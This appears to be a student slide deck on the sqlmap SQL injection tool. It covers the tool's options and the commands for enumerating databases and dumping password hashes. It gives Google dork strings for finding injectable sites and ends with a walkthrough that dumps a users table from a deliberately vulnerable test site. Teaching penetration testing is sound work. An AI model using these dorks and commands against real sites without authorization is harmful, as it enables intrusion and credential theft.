Scribd
Upload
47 views22 pages

Sqlmap - By-22011556-105

sqlmap practical screenshots attached

Uploaded by

Nasir Ali
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
47 views22 pages

Sqlmap - By-22011556-105

sqlmap practical screenshots attached

Uploaded by

Nasir Ali
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 22

sqlmap

By: Alishba Sehar


sqlmap

• It is a open source tool to use sql injection in better and simpler way.
• sqlmap Developed in python
• sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers.

• It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database fingerprinting, over data fetching from the database, to
accessing the underlying file system and executing commands on the operating system via out-of-band
connections.
Sqlmap developed by

Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm)


https://twitter.com/inquisb https://twitter.com/stamparm
Features of sqlmap
•It support various type of database like
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• HSQLDB
• Informix database management systems.
Features of sqlmap
•SQL injection techniques:
1.boolean-based blind
2.time-based blind
3.error-based
4.UNION query
5.stacked queries
6.out-of-band
•Enumerate users, password hashes, privileges, roles, databases, tables and columns.
• cracking password using a dictionary-based attack.
•Support to dump database tables entirely.
•Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
Options
 These options can be used to customize the detection phase
 --crawl=CRAWL Crawl the website starting from the target URL
 --batch=BATCH Run in batch mode without user interaction
 --thread=THREADS Number of threads to use in operations (1-10, default 1)
 --risk=RISK Risk of tests to perform (1-3, default 1)
 --level=LEVEL Level of tests to perform (1-5, default 1)
 --v= VERBOSITY Verbosity level of output (0-6, default 1)
 ---tamper=ENCODE Use tamper scripts to encode the payloads
Crawl
•Depth 1: http://www.example.com/news
•Depth 2: http://www.example.com/news/newest/
•Depth 3: http://www.example.com/news/newest/terror/
•Depth 4: http://www.example.com/news/newest/terror/country/

--crawl 2
Verbosity
 0: Show only python traceback, error and critical messages.
 1: also show information and warning messages.
 2: also show debug messages.
 3: also show payloads injected.
 4: also show http requests.
 5: also show http response headers.
 6: also show http responses’ page content.
Extracting Information With Sqlmap
RECOVER SESSION USER USING SQLMAP.
--current-user

DETECT CURRENT DATABASE USING SQLMAP.


--current-db

FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP.


--is-dba

LIST DATABASE SYSTEM USERS USING SQLMAP.


--users

LIST DATABASES USING SQLMAP.


--dbs

DBMS SERVER HOSTNAME.


--hostname

DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL.


-f
Extracting Information With Sqlmap

LIST THE DBMS USERS.


--users

LIST ALL DBMS USERS, PASSWORD HASHES


--passwords

LIST USERS PRIVILEGES.


--privileges

LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE


--columns (-T <table name> -D <database>)

EXECUTING A CUSTOM SQL QUERY.


--sql-query=“<sql query to execute>”

SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES


--sql-shell
Extracting Information With Sqlmap

DBMS database to enumerate


-D (Database_name)

DBMS database table(s) to enumerate


-T (table_name)

DBMS database table column(s) to enumerate


-C (columns_name)

Dump DBMS database table entries


--dump

Dump all DBMS databases tables entries


--dump-all

Enumerate DBMS database tables


--tables

Enumerate DBMS users roles


--roles
Extracting Information With Sqlmap

Retrieve DBMS banner


-b, --banner

Enumerate DBMS schema


--schema

Retrieve DBMS comments


--comments
Sqlmap : workflow
•Find a vulnerable website
• Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
• inurl:product-item.php?id=
• inurl:news.php?catid=
• inurl:index.php?id=
• inurl:title.php?id=
•Identify possible injections points
•Identify SQLI vulnerabilities:
• By using sqlmap
• Manual testing

•Exploit SQLi vulnerabilities


Requirement

Kali Linux installed


Sqlmap installed
DBMS databases using SQLMAP SQL Injection
Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
DBMS databases using SQLMAP SQL Injection
List tables of target database using SQLMAP SQL
Injection
Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart --tables
List tables of target database using SQLMAP SQL Injection
List columns on target table of selected database
using SQLMAP SQL Injection
Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --coulmns
List user and password from target columns of target table of
selected database using SQLMAP SQL Injection
Sqlmap –u http://testphp.vulnweb.com/listproducts.php?cat=1 –D acuart –T users --dump
References
http://www.sqlinjection.net/sqlmap/tutorial/

http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/

https://github.com/sqlmapproject/sqlmap/wiki/Usage
Thank you

You might also like